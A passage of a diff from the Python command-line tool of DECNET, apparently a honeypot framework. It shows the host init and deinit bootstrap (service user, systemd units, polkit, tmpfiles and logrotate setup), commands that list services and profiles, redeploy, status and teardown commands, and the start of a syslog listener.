    ``skip: ...`` outcome when the user already exists, ``"ok"`` otherwise.
    """
    try:
        pwd.getpwnam(user)
    except KeyError:
        # Lookup failed, so the account does not exist yet.
        useradd_argv = [
            "useradd", "--system",
            "--gid", group,
            "--home-dir", install_dir,
            "--shell", "/usr/sbin/nologin",
            "--comment", "DECNET honeypot",
            user,
        ]
        _run(useradd_argv, dry_run=dry_run)
        return "ok"
    return f"skip: user {user} already exists"
|
||||
|
||||
|
||||
def _ensure_dir(
    path: Path, *, mode: int, owner: str, group: str, dry_run: bool
) -> str:
    """Make sure directory *path* exists with the requested mode and owner.

    Under *dry_run* nothing is touched; the intended action is printed.
    Otherwise the directory (and parents) is created, then chmod/chown are
    attempted on a best-effort basis.

    Returns:
        ``"ok"`` when the path did not exist beforehand, otherwise a
        ``skip: ...`` outcome.
    """
    already_there = path.exists()

    if not dry_run:
        path.mkdir(parents=True, exist_ok=True)
        try:
            os.chmod(path, mode)
            owner_uid = pwd.getpwnam(owner).pw_uid
            group_gid = grp.getgrnam(group).gr_gid
            os.chown(path, owner_uid, group_gid)
        except (KeyError, PermissionError):
            # Unknown owner/group, or not running as root: creating the
            # directory is what matters here, so permission fixes are
            # allowed to fail silently.
            pass
        if already_there:
            return f"skip: {path} already present"
        return "ok"

    console.print(
        f" [dim]would ensure dir:[/] {path} (mode={oct(mode)}, "
        f"owner={owner}:{group})"
    )
    if already_there:
        return "skip: dry-run"
    return "ok"
|
||||
|
||||
|
||||
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
    """Write the placeholder config to *path* unless a file is already there.

    An existing file is never overwritten.  A new file is written as UTF-8
    (the placeholder contains non-ASCII characters, so relying on the
    locale's default encoding could fail), then set to mode ``0o640`` and
    owned by uid 0 with *group* as its group, on a best-effort basis.

    Returns:
        A ``skip: ...`` outcome when *path* exists, otherwise ``"ok"``
        (under *dry_run* the write is only announced).
    """
    if path.exists():
        return f"skip: {path} already present"
    if dry_run:
        console.print(f" [dim]would write:[/] {path}")
        return "ok"
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(_CONFIG_PLACEHOLDER, encoding="utf-8")
    try:
        os.chmod(path, 0o640)
        gid = grp.getgrnam(group).gr_gid
        os.chown(path, 0, gid)
    except (KeyError, PermissionError):
        # Group missing or not running as root: keep the file as written.
        pass
    return "ok"
|
||||
|
||||
|
||||
def _copy_if_changed(
    src: Path, dst: Path, *, mode: int, force: bool, dry_run: bool
) -> str:
    """Install *src* at *dst* unless an identical copy is already in place.

    The copy is skipped when *dst* exists, *force* is false and both files
    have the same SHA-256.  After copying, chmod to *mode* and chown to
    root:root are attempted; a ``PermissionError`` there is ignored.

    Returns:
        A ``skip: ...`` outcome when nothing had to be done, else ``"ok"``.
    """
    unchanged = dst.exists() and not force and _sha256(src) == _sha256(dst)
    if unchanged:
        return f"skip: {dst} up to date"

    if not dry_run:
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(src, dst)
        try:
            os.chmod(dst, mode)
            os.chown(dst, 0, 0)
        except PermissionError:
            # Not running as root: the file content is still installed.
            pass
        return "ok"

    console.print(f" [dim]would install:[/] {src} -> {dst} (mode={oct(mode)})")
    return "ok"
|
||||
|
||||
|
||||
def _render_template(src: Path, context: dict[str, str]) -> str:
    """Render the Jinja2 template file *src* with *context* and return the text.

    The environment uses ``StrictUndefined`` so that a variable missing
    from *context* raises instead of rendering as an empty string, and
    ``keep_trailing_newline`` so the file's final newline survives.
    """
    jinja_env = Environment(
        loader=FileSystemLoader(str(src.parent)),
        undefined=StrictUndefined,
        keep_trailing_newline=True,
        autoescape=False,  # nosec B701 — rendering systemd INI, not HTML
    )
    return jinja_env.get_template(src.name).render(**context)
|
||||
|
||||
|
||||
def _write_rendered_if_changed(
    src: Path, dst: Path, rendered: str, *, mode: int, force: bool, dry_run: bool
) -> str:
    """Persist *rendered* at *dst* unless the file already holds that content.

    The comparison is between the rendered output (UTF-8 encoded) and the
    bytes currently on disk, not the template source, so re-running with
    the same context is a no-op.  *src* is only used for the dry-run
    message.  After writing, chmod to *mode* and chown to root:root are
    attempted; a ``PermissionError`` there is ignored.

    Returns:
        A ``skip: ...`` outcome when *dst* is already current, else ``"ok"``.
    """
    payload = rendered.encode("utf-8")
    if dst.exists() and not force and dst.read_bytes() == payload:
        return f"skip: {dst} up to date"

    if not dry_run:
        dst.parent.mkdir(parents=True, exist_ok=True)
        dst.write_bytes(payload)
        try:
            os.chmod(dst, mode)
            os.chown(dst, 0, 0)
        except PermissionError:
            # Not running as root: the content is still written.
            pass
        return "ok"

    console.print(f" [dim]would render:[/] {src} -> {dst} (mode={oct(mode)})")
    return "ok"
|
||||
|
||||
|
||||
def _resolve_venv_dir(install_dir: str, explicit: str | None) -> str:
|
||||
"""Pick the virtualenv systemd units should ExecStart out of.
|
||||
|
||||
Priority:
|
||||
1. ``--venv-dir`` flag (explicit; absolute path required).
|
||||
2. ``VIRTUAL_ENV`` env var, but only when it lives under
|
||||
``install_dir`` (refuse to bake /home/user/.venv into a system
|
||||
service — that directory is user-owned and may vanish).
|
||||
3. ``{install_dir}/venv`` — what ``enroll_bootstrap.sh`` creates
|
||||
on fresh agents; the production default.
|
||||
4. First hit from a short list of dev-box conventions under
|
||||
``install_dir``: ``.venv``, ``.311``, ``.312``, ``.313``.
|
||||
|
||||
Raises RuntimeError with an operator-friendly message if none of
|
||||
those resolve to a directory containing ``bin/decnet``. Failing loud
|
||||
at init time beats systemd spamming journalctl with
|
||||
'Failed at step EXEC spawning .../venv/bin/decnet: No such file or
|
||||
directory' on every auto-restart.
|
||||
"""
|
||||
install_path = Path(install_dir)
|
||||
|
||||
candidates: list[Path] = []
|
||||
if explicit:
|
||||
if not explicit.startswith("/"):
|
||||
raise RuntimeError(
|
||||
f"--venv-dir must be an absolute path, got {explicit!r}"
|
||||
)
|
||||
candidates.append(Path(explicit))
|
||||
else:
|
||||
virtual_env = os.environ.get("VIRTUAL_ENV")
|
||||
if virtual_env:
|
||||
ve_path = Path(virtual_env)
|
||||
try:
|
||||
ve_path.relative_to(install_path)
|
||||
candidates.append(ve_path)
|
||||
except ValueError:
|
||||
# VIRTUAL_ENV lives outside install_dir — don't bake a
|
||||
# user-home venv into a root-owned systemd unit.
|
||||
pass
|
||||
candidates.append(install_path / "venv")
|
||||
for name in (".venv", ".311", ".312", ".313"):
|
||||
candidates.append(install_path / name)
|
||||
|
||||
for cand in candidates:
|
||||
if (cand / "bin" / "decnet").is_file():
|
||||
return str(cand)
|
||||
|
||||
searched = ", ".join(str(c) for c in candidates)
|
||||
raise RuntimeError(
|
||||
"Could not find a DECNET venv. Create one first (e.g. "
|
||||
f"`python -m venv {install_path}/venv && "
|
||||
f"{install_path}/venv/bin/pip install -e {install_path}[dev]`) "
|
||||
"or pass --venv-dir. Searched: " + searched
|
||||
)
|
||||
|
||||
|
||||
def _install_units(
    deploy: Path,
    systemd_dir: Path,
    *,
    install_dir: str,
    venv_dir: str,
    user: str,
    group: str,
    force: bool,
    dry_run: bool,
) -> str:
    """Install the systemd unit files from *deploy* into *systemd_dir*.

    Every ``decnet-*.service.j2`` template is rendered with the install
    dir, venv dir, user and group, and written without its ``.j2`` suffix.
    ``decnet.target`` is copied verbatim.  All files are installed with
    mode ``0o644``.

    Returns:
        ``skip: N unit files up to date`` when nothing changed, otherwise
        ``ok (touched/total installed)``.
    """
    render_context = {
        "install_dir": install_dir,
        "venv_dir": venv_dir,
        "user": user,
        "group": group,
    }
    templates = sorted(deploy.glob("decnet-*.service.j2"))
    static = [deploy / "decnet.target"]

    outcomes: list[str] = []
    for template in templates:
        text = _render_template(template, render_context)
        # decnet-api.service.j2 → decnet-api.service
        unit_name = template.name[: -len(".j2")]
        outcomes.append(
            _write_rendered_if_changed(
                template, systemd_dir / unit_name, text,
                mode=0o644, force=force, dry_run=dry_run,
            )
        )
    for unit in static:
        outcomes.append(
            _copy_if_changed(
                unit, systemd_dir / unit.name,
                mode=0o644, force=force, dry_run=dry_run,
            )
        )

    total = len(templates) + len(static)
    touched = sum(1 for outcome in outcomes if not outcome.startswith("skip:"))
    if touched:
        return f"ok ({touched}/{total} installed)"
    return f"skip: {total} unit files up to date"
|
||||
|
||||
|
||||
def _install_polkit(
    deploy: Path, rules_dir: Path, *, group: str, force: bool, dry_run: bool
) -> str:
    """Render the group-scoped polkit rule template into *rules_dir*.

    The rendered rule must name the same POSIX group that was passed via
    --group; otherwise the API (running as that user) cannot
    ``systemctl start/stop decnet-*.service`` without an interactive auth
    prompt, which nobody can answer in a daemon context.

    Raises ``RuntimeError`` when the template is missing from *deploy*.
    """
    template = deploy / "polkit" / "50-decnet-workers.rules.j2"
    if not template.is_file():
        raise RuntimeError(f"missing polkit rule template at {template}")

    rule_text = _render_template(template, {"group": group})
    # 50-decnet-workers.rules.j2 → 50-decnet-workers.rules
    destination = rules_dir / template.name.removesuffix(".j2")
    return _write_rendered_if_changed(
        template, destination, rule_text,
        mode=0o644, force=force, dry_run=dry_run,
    )
|
||||
|
||||
|
||||
def _run_allow_fail(argv: List[str], *, dry_run: bool) -> str:
    """Run *argv*, treating a non-zero exit status as a skip, not an error.

    Intended for deinit, where stopping or disabling an already-absent unit
    is fine. In dry-run mode the command is only printed.
    """
    if not dry_run:
        log.info("init: exec (allow fail) %s", argv)
        completed = subprocess.run(argv, check=False)  # nosec B603
        exit_code = completed.returncode
        return "ok" if exit_code == 0 else f"skip: rc={exit_code} (already absent)"

    console.print(f"  [dim]would run (allow fail):[/] {' '.join(argv)}")
    return "ok"
|
||||
|
||||
|
||||
def _remove_file(path: Path, *, dry_run: bool) -> str:
|
||||
if not path.exists() and not path.is_symlink():
|
||||
return f"skip: {path} already absent"
|
||||
if dry_run:
|
||||
console.print(f" [dim]would remove:[/] {path}")
|
||||
return "ok"
|
||||
path.unlink()
|
||||
return "ok"
|
||||
|
||||
|
||||
def _uninstall_units(systemd_dir: Path, *, dry_run: bool) -> str:
|
||||
removed = 0
|
||||
present = sorted(systemd_dir.glob("decnet-*.service"))
|
||||
target = systemd_dir / "decnet.target"
|
||||
if target.exists():
|
||||
present.append(target)
|
||||
for path in present:
|
||||
if dry_run:
|
||||
console.print(f" [dim]would remove:[/] {path}")
|
||||
removed += 1
|
||||
continue
|
||||
path.unlink()
|
||||
removed += 1
|
||||
if removed == 0:
|
||||
return "skip: no decnet unit files present"
|
||||
return f"ok ({removed} removed)"
|
||||
|
||||
|
||||
def _remove_user(user: str, *, dry_run: bool) -> str:
|
||||
try:
|
||||
pwd.getpwnam(user)
|
||||
except KeyError:
|
||||
return f"skip: user {user} already absent"
|
||||
# userdel returns non-zero if the user still owns running
|
||||
# processes; that's the operator's problem to sort out, not ours.
|
||||
return _run_allow_fail(["userdel", user], dry_run=dry_run)
|
||||
|
||||
|
||||
def _remove_group(group: str, *, dry_run: bool) -> str:
|
||||
try:
|
||||
grp.getgrnam(group)
|
||||
except KeyError:
|
||||
return f"skip: group {group} already absent"
|
||||
return _run_allow_fail(["groupdel", group], dry_run=dry_run)
|
||||
|
||||
|
||||
def _remove_dir_if_present(
|
||||
path: Path, *, dry_run: bool, recursive: bool = False
|
||||
) -> str:
|
||||
if not path.exists():
|
||||
return f"skip: {path} already absent"
|
||||
if dry_run:
|
||||
verb = "would rm -rf" if recursive else "would rmdir"
|
||||
console.print(f" [dim]{verb}:[/] {path}")
|
||||
return "ok"
|
||||
if recursive:
|
||||
shutil.rmtree(path, ignore_errors=True)
|
||||
else:
|
||||
try:
|
||||
path.rmdir()
|
||||
except OSError as exc:
|
||||
return f"skip: {path} not empty ({exc.strerror})"
|
||||
return "ok"
|
||||
|
||||
|
||||
def _install_tmpfiles(
    deploy: Path, tmpfiles_dir: Path, *, force: bool, dry_run: bool
) -> str:
    """Copy the ``decnet.conf`` tmpfiles.d entry and apply it right away.

    Returns the status string from the copy step. Raises ``RuntimeError``
    when the entry is missing from *deploy*.
    """
    entry = deploy / "tmpfiles.d" / "decnet.conf"
    if not entry.is_file():
        raise RuntimeError(f"missing tmpfiles.d entry at {entry}")

    installed = tmpfiles_dir / entry.name
    outcome = _copy_if_changed(
        entry, installed,
        mode=0o644, force=force, dry_run=dry_run,
    )
    # Apply immediately so /run/decnet exists before daemon-reload.
    _run(["systemd-tmpfiles", "--create", str(installed)], dry_run=dry_run)
    return outcome
|
||||
|
||||
|
||||
def _install_logrotate(
    deploy: Path, logrotate_dir: Path, *, force: bool, dry_run: bool
) -> str:
    """Install the DECNET logrotate config as ``<logrotate_dir>/decnet``.

    The ingester / forwarder keep their log files open from Python, so the
    shipped config relies on ``copytruncate`` instead of rename+create.
    Without rotation /var/log/decnet/ grows without bound, and one noisy
    day of attacker traffic can fill the disk on a small VPS. A host with
    no logrotate installed still boots fine; the operator just has to wire
    up their own rotation.

    Raises ``RuntimeError`` when the config is missing from *deploy*.
    """
    config = deploy / "logrotate.d" / "decnet"
    if not config.is_file():
        raise RuntimeError(f"missing logrotate config at {config}")

    destination = logrotate_dir / config.name
    return _copy_if_changed(
        config, destination,
        mode=0o644, force=force, dry_run=dry_run,
    )
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``init`` command (host bootstrap and ``--deinit``) to *app*."""

    @app.command(name="init")
    def init_cmd(
        dry_run: bool = typer.Option(
            False, "--dry-run",
            help="Print every action; make no changes.",
        ),
        no_start: bool = typer.Option(
            False, "--no-start",
            help="Install everything but don't `systemctl enable --now decnet.target`.",
        ),
        force: bool = typer.Option(
            False, "--force",
            help="Overwrite unit / polkit / tmpfiles entries even if identical.",
        ),
        deinit: bool = typer.Option(
            False, "--deinit",
            help="Undo a previous init: stop + disable decnet.target, remove "
                 "unit files, polkit rule, tmpfiles.d entry, /etc/decnet. "
                 "Preserves /var/lib/decnet, /var/log/decnet, and the "
                 "service user/group — pass --purge to remove those too.",
        ),
        purge: bool = typer.Option(
            False, "--purge",
            help="With --deinit, also wipe /var/lib/decnet, "
                 "/var/log/decnet, AND the service user/group. "
                 "Destructive — operator data is gone, and if --user "
                 "points at your own login account, that account goes "
                 "with it. Only use when the user/group was created by "
                 "`decnet init` in the first place.",
        ),
        user: str = typer.Option(
            "decnet", "--user",
            help="System user to own DECNET processes.",
        ),
        group: str = typer.Option(
            "decnet", "--group",
            help="Primary group of the DECNET user.",
        ),
        install_dir: str = typer.Option(
            "/opt/decnet", "--install-dir",
            help="Absolute path where DECNET is installed. Default "
                 "/opt/decnet; distros that reserve /opt can point this "
                 "at /srv/decnet, /usr/local/decnet, etc. Gets rendered "
                 "into every systemd unit via Jinja2 and used as the "
                 "decnet user's home directory.",
        ),
        venv_dir: Optional[str] = typer.Option(
            None, "--venv-dir",
            help="Absolute path to the Python venv systemd should "
                 "ExecStart from. If omitted, auto-detected in order: "
                 "$VIRTUAL_ENV (if under --install-dir), "
                 "{install-dir}/venv, then {install-dir}/{.venv,.311,"
                 ".312,.313}. Init aborts if none exists.",
        ),
        prefix: str = typer.Option(
            "", "--prefix", hidden=True,
            help="Filesystem prefix for tests (e.g. tmp_path). Empty = real root.",
        ),
    ) -> None:
        """One-shot bootstrap of a DECNET master host.

        Creates the `decnet` user/group, installs systemd units,
        polkit rules, tmpfiles.d entries, seeds directories and
        drops a placeholder config, then starts decnet.target.
        """
        _require_master_mode("init")

        if purge and not deinit:
            console.print("[red]--purge only applies with --deinit[/]")
            raise typer.Exit(1)

        # Name of the operation, used in every pre-flight error message.
        verb = "deinit" if deinit else "init"

        # Root check — skip when --prefix is set (tests don't run as root).
        if not prefix and os.geteuid() != 0:
            console.print(f"[red]decnet {verb}: must run as root (use sudo)[/]")
            raise typer.Exit(1)

        if not install_dir.startswith("/"):
            console.print(
                f"[red]decnet {verb}: --install-dir must be absolute, got {install_dir!r}[/]"
            )
            raise typer.Exit(1)
        # Strip leading slash so pfx-joining works under --prefix test mode
        # (Path(pfx) / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
        _install_rel = install_dir.lstrip("/")

        # Only require the tools this run will actually invoke: userdel and
        # groupdel are used exclusively by the --purge steps, so a plain
        # --deinit must not fail on hosts that lack them.
        if deinit:
            required_tools = ("systemctl",)
            if purge:
                required_tools += ("userdel", "groupdel")
        else:
            required_tools = (
                "systemctl", "useradd", "groupadd", "systemd-tmpfiles",
            )
        if not dry_run:
            for tool in required_tools:
                if shutil.which(tool) is None:
                    console.print(f"[red]decnet {verb}: {tool!r} is required on PATH[/]")
                    raise typer.Exit(1)

        pfx = Path(prefix) if prefix else Path("/")
        systemd_dir = pfx / "etc/systemd/system"
        polkit_dir = pfx / "etc/polkit-1/rules.d"
        tmpfiles_dir = pfx / "etc/tmpfiles.d"
        logrotate_dir = pfx / "etc/logrotate.d"
        etc_decnet = pfx / "etc/decnet"

        if deinit:
            console.print(
                f"[bold cyan]DECNET deinit[/] "
                f"(dry_run={dry_run}, purge={purge})"
            )
            _step(
                "systemctl stop + disable decnet.target",
                lambda: _run_allow_fail(
                    ["systemctl", "disable", "--now", "decnet.target"],
                    dry_run=dry_run,
                ),
            )
            _step(
                "remove systemd unit files",
                lambda: _uninstall_units(systemd_dir, dry_run=dry_run),
            )
            _step(
                "remove polkit rule",
                lambda: _remove_file(
                    polkit_dir / "50-decnet-workers.rules",
                    dry_run=dry_run,
                ),
            )
            _step(
                "remove tmpfiles.d entry",
                lambda: _remove_file(
                    tmpfiles_dir / "decnet.conf",
                    dry_run=dry_run,
                ),
            )
            _step(
                "remove logrotate config",
                lambda: _remove_file(
                    logrotate_dir / "decnet",
                    dry_run=dry_run,
                ),
            )
            _step(
                "systemctl daemon-reload",
                lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
            )
            _step(
                f"remove {etc_decnet / 'decnet.ini'}",
                lambda: _remove_file(etc_decnet / "decnet.ini", dry_run=dry_run),
            )
            # Legacy name from pre-domain-sections placeholder era.
            # Harmless if absent (the _remove_file step logs skip).
            _step(
                f"remove legacy {etc_decnet / 'config.ini'}",
                lambda: _remove_file(etc_decnet / "config.ini", dry_run=dry_run),
            )
            _step(
                f"remove {etc_decnet}",
                lambda: _remove_dir_if_present(etc_decnet, dry_run=dry_run),
            )
            _step(
                f"remove {pfx / 'run/decnet'}",
                lambda: _remove_dir_if_present(
                    pfx / "run/decnet", dry_run=dry_run,
                ),
            )
            _step(
                f"remove {pfx / _install_rel}",
                lambda: _remove_dir_if_present(
                    pfx / _install_rel, dry_run=dry_run,
                ),
            )
            if purge:
                _step(
                    f"purge {pfx / 'var/lib/decnet'}",
                    lambda: _remove_dir_if_present(
                        pfx / "var/lib/decnet",
                        dry_run=dry_run, recursive=True,
                    ),
                )
                _step(
                    f"purge {pfx / 'var/log/decnet'}",
                    lambda: _remove_dir_if_present(
                        pfx / "var/log/decnet",
                        dry_run=dry_run, recursive=True,
                    ),
                )
            else:
                console.print(
                    f"[dim]preserved {pfx / 'var/lib/decnet'} and "
                    f"{pfx / 'var/log/decnet'} (operator data); "
                    "re-run with --purge to remove.[/]"
                )
            # User / group removal is also gated on --purge. In dev the
            # operator may have passed their own login user via
            # `--user $USER` to avoid ownership churn; an unconditional
            # `userdel` during deinit would nuke their account.
            if purge:
                _step(
                    f"remove user {user!r}",
                    lambda: _remove_user(user, dry_run=dry_run),
                )
                _step(
                    f"remove group {group!r}",
                    lambda: _remove_group(group, dry_run=dry_run),
                )
            else:
                console.print(
                    f"[dim]preserved user {user!r} and group {group!r}; "
                    "re-run with --purge to remove (only do this if "
                    "they were created by `decnet init`).[/]"
                )
            console.print("[bold green]DECNET deinit complete.[/]")
            return

        try:
            deploy = _deploy_root()
        except RuntimeError as exc:
            console.print(f"[red]decnet init: {exc}[/]")
            raise typer.Exit(1) from exc

        # Resolve venv BEFORE any file writes — fails loud if the
        # operator hasn't created one yet, instead of shipping broken
        # systemd units that journalctl spams forever. Skipped under
        # --prefix (test mode) because the test harness doesn't build a
        # real venv and the rendered string is asserted on directly.
        if prefix:
            resolved_venv = venv_dir or f"{install_dir}/venv"
        else:
            try:
                resolved_venv = _resolve_venv_dir(install_dir, venv_dir)
            except RuntimeError as exc:
                console.print(f"[red]decnet init: {exc}[/]")
                raise typer.Exit(1) from exc
            console.print(f"[dim]using venv: {resolved_venv}[/]")

        # (path, mode, owner, group) for every directory init must ensure.
        dirs = [
            (pfx / _install_rel, 0o755, user, group),
            (pfx / "var/lib/decnet", 0o750, user, group),
            (pfx / "var/lib/decnet/geoip", 0o755, user, group),
            (pfx / "var/log/decnet", 0o750, user, group),
            (etc_decnet, 0o755, "root", group),
            (pfx / "run/decnet", 0o755, "root", group),
        ]

        console.print(
            f"[bold cyan]DECNET init[/] "
            f"(dry_run={dry_run}, no_start={no_start}, force={force})"
        )

        _step(
            f"ensure group {group!r}",
            lambda: _ensure_group(group, dry_run=dry_run),
        )
        _step(
            f"ensure user {user!r}",
            lambda: _ensure_user(user, group, install_dir, dry_run=dry_run),
        )
        for path, mode, d_owner, d_group in dirs:
            # Bind the loop variables as defaults so each lambda keeps its
            # own values instead of seeing the last iteration's.
            _step(
                f"ensure dir {path}",
                lambda p=path, m=mode, o=d_owner, g=d_group:
                    _ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
            )
        _step(
            f"write {etc_decnet / 'decnet.ini'}",
            lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
        )
        _step(
            "install systemd units",
            lambda: _install_units(
                deploy, systemd_dir,
                install_dir=install_dir, venv_dir=resolved_venv,
                user=user, group=group,
                force=force, dry_run=dry_run,
            ),
        )
        _step(
            "install polkit rule",
            lambda: _install_polkit(
                deploy, polkit_dir, group=group,
                force=force, dry_run=dry_run,
            ),
        )
        _step(
            "install tmpfiles.d entry",
            lambda: _install_tmpfiles(
                deploy, tmpfiles_dir, force=force, dry_run=dry_run,
            ),
        )
        _step(
            "install logrotate config",
            lambda: _install_logrotate(
                deploy, logrotate_dir, force=force, dry_run=dry_run,
            ),
        )
        _step(
            "systemctl daemon-reload",
            lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
        )

        if no_start:
            console.print("[yellow]--no-start: skipping decnet.target start[/]")
            return

        try:
            _step(
                "systemctl enable --now decnet.target",
                lambda: (
                    _run(
                        ["systemctl", "enable", "--now", "decnet.target"],
                        dry_run=dry_run,
                    ),
                    "ok",
                )[1],
            )
        except subprocess.CalledProcessError as exc:
            console.print(
                f"[red]decnet.target failed to start (rc={exc.returncode}); "
                "inspect `systemctl status decnet.target` and individual "
                "`decnet-*.service` units.[/]"
            )
            raise typer.Exit(1) from exc

        console.print("[bold green]DECNET init complete.[/] "
                      "Check `decnet status` or the Workers panel.")
        sys.stdout.flush()
|
||||
@@ -1,52 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.archetypes import all_archetypes
|
||||
from decnet.distros import all_distros
|
||||
from decnet.services.registry import all_services
|
||||
|
||||
from .utils import console
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the listing commands (services, distros, archetypes) to *app*."""

    @app.command(name="services")
    def list_services() -> None:
        """List all registered honeypot service plugins."""
        registered = all_services()
        listing = Table(title="Available Services", show_lines=True)
        listing.add_column("Name", style="bold cyan")
        listing.add_column("Ports")
        listing.add_column("Image")
        for svc_name, plugin in sorted(registered.items()):
            port_text = ", ".join(str(port) for port in plugin.ports)
            listing.add_row(svc_name, port_text, plugin.default_image)
        console.print(listing)

    @app.command(name="distros")
    def list_distros() -> None:
        """List all available OS distro profiles for deckies."""
        listing = Table(title="Available Distro Profiles", show_lines=True)
        listing.add_column("Slug", style="bold cyan")
        listing.add_column("Display Name")
        listing.add_column("Docker Image", style="dim")
        profiles = all_distros()
        for slug, distro in sorted(profiles.items()):
            listing.add_row(slug, distro.display_name, distro.image)
        console.print(listing)

    @app.command(name="archetypes")
    def list_archetypes() -> None:
        """List all machine archetype profiles."""
        listing = Table(title="Machine Archetypes", show_lines=True)
        listing.add_column("Slug", style="bold cyan")
        listing.add_column("Display Name")
        listing.add_column("Default Services", style="green")
        listing.add_column("Description", style="dim")
        archetypes = all_archetypes()
        for slug, archetype in sorted(archetypes.items()):
            service_text = ", ".join(archetype.services)
            listing.add_row(
                slug, archetype.display_name, service_text, archetype.description,
            )
        console.print(listing)
|
||||
@@ -1,147 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import subprocess # nosec B404
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.env import DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .gating import _agent_mode_active, _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``redeploy``, ``status`` and ``teardown`` commands to *app*."""

    @app.command()
    def redeploy(
        log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to the DECNET log file"),
    ) -> None:
        """Check running DECNET services and relaunch any that are down."""
        log.info("redeploy: checking services")
        registry = _utils._service_registry(str(log_file))

        table = Table(title="DECNET Services", show_lines=True)
        table.add_column("Service", style="bold cyan")
        table.add_column("Status")
        table.add_column("PID", style="dim")
        table.add_column("Action")

        relaunched = 0
        failed = 0
        for name, match_fn, launch_args in registry:
            pid = _utils._is_running(match_fn)
            if pid is not None:
                table.add_row(name, "[green]UP[/]", str(pid), "—")
                continue
            try:
                subprocess.Popen(  # nosec B603
                    launch_args,
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (OSError, subprocess.SubprocessError) as exc:
                # OSError covers a missing binary as well as permission
                # and other spawn errors; one bad service must not abort
                # the check of the remaining ones.
                failed += 1
                table.add_row(name, "[red]DOWN[/]", "—", f"[red]failed: {exc}[/]")
            else:
                relaunched += 1
                table.add_row(name, "[red]DOWN[/]", "—", "[green]relaunched[/]")

        console.print(table)
        if relaunched:
            console.print(f"[green]{relaunched} service(s) relaunched.[/]")
        if failed:
            # Without this, a run where every relaunch failed would be
            # summarised as "All services running."
            console.print(f"[red]{failed} service(s) failed to relaunch.[/]")
        if not relaunched and not failed:
            console.print("[green]All services running.[/]")

    @app.command()
    def status() -> None:
        """Show running deckies and the state of every ``decnet-*`` unit.

        Prefers systemd (``systemctl list-units 'decnet-*.service'``) so
        agents, masters and mixed hosts all get one consistent view of
        what's installed, loaded, and active. Falls back to the psutil
        cmdline registry on boxes without systemd (dev laptops, CI
        containers, non-systemd init) so `decnet status` is still useful
        there.
        """
        log.info("status command invoked")
        from decnet.engine import status as _status
        _status()

        units = _utils._systemd_units()
        if units is not None:
            _render_systemd_units(units)
        else:
            _render_psutil_fallback()

    def _render_systemd_units(units: list[dict]) -> None:
        """Print one table row per systemd unit, or a hint when there are none."""
        if not units:
            console.print(
                "[yellow]No decnet-* systemd units loaded. "
                "Run `sudo decnet init` to install them.[/]"
            )
            return

        def _active_style(active: str) -> str:
            # Green for active, red for failed, yellow for anything else.
            if active == "active":
                return "[green]active[/]"
            if active == "failed":
                return "[red]failed[/]"
            return f"[yellow]{active}[/]"

        svc_table = Table(title="DECNET Services (systemd)", show_lines=True)
        svc_table.add_column("Unit", style="bold cyan")
        svc_table.add_column("Load")
        svc_table.add_column("Active")
        svc_table.add_column("Sub")
        svc_table.add_column("Description", style="dim")

        for u in sorted(units, key=lambda x: x.get("unit", "")):
            svc_table.add_row(
                u.get("unit", ""),
                u.get("load", ""),
                _active_style(u.get("active", "")),
                u.get("sub", ""),
                u.get("description", ""),
            )
        console.print(svc_table)

    def _render_psutil_fallback() -> None:
        """Print UP/DOWN per registry service, used when systemd data is unavailable."""
        registry = _utils._service_registry(str(DECNET_INGEST_LOG_FILE))
        if _agent_mode_active():
            # In agent mode these three services are left out of the table.
            registry = [r for r in registry if r[0] not in {"Mutator", "Profiler", "API"}]
        svc_table = Table(
            title="DECNET Services (psutil fallback — systemd unavailable)",
            show_lines=True,
        )
        svc_table.add_column("Service", style="bold cyan")
        svc_table.add_column("Status")
        svc_table.add_column("PID", style="dim")

        for name, match_fn, _launch_args in registry:
            pid = _utils._is_running(match_fn)
            if pid is not None:
                svc_table.add_row(name, "[green]UP[/]", str(pid))
            else:
                svc_table.add_row(name, "[red]DOWN[/]", "—")

        console.print(svc_table)

    @app.command()
    def teardown(
        all_: bool = typer.Option(False, "--all", help="Tear down all deckies and remove network"),
        id_: Optional[str] = typer.Option(None, "--id", help="Tear down a specific decky by name"),
    ) -> None:
        """Stop and remove deckies."""
        _require_master_mode("teardown")
        if not all_ and not id_:
            console.print("[red]Specify --all or --id <name>.[/]")
            raise typer.Exit(1)

        log.info("teardown command invoked all=%s id=%s", all_, id_)
        from decnet.engine import teardown as _teardown
        _teardown(decky_id=id_)
        log.info("teardown complete all=%s id=%s", all_, id_)

        if all_:
            _utils._kill_all_services()
|
||||
@@ -1,57 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import pathlib
|
||||
import signal
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``listener`` command to *app*."""

    @app.command()
    def listener(
        bind_host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the master syslog-TLS listener"),  # nosec B104
        bind_port: int = typer.Option(6514, "--port", help="Listener TCP port (RFC 5425 default 6514)"),
        log_path: Optional[str] = typer.Option(None, "--log-path", help="RFC 5424 forensic sink (default: ./master.log)"),
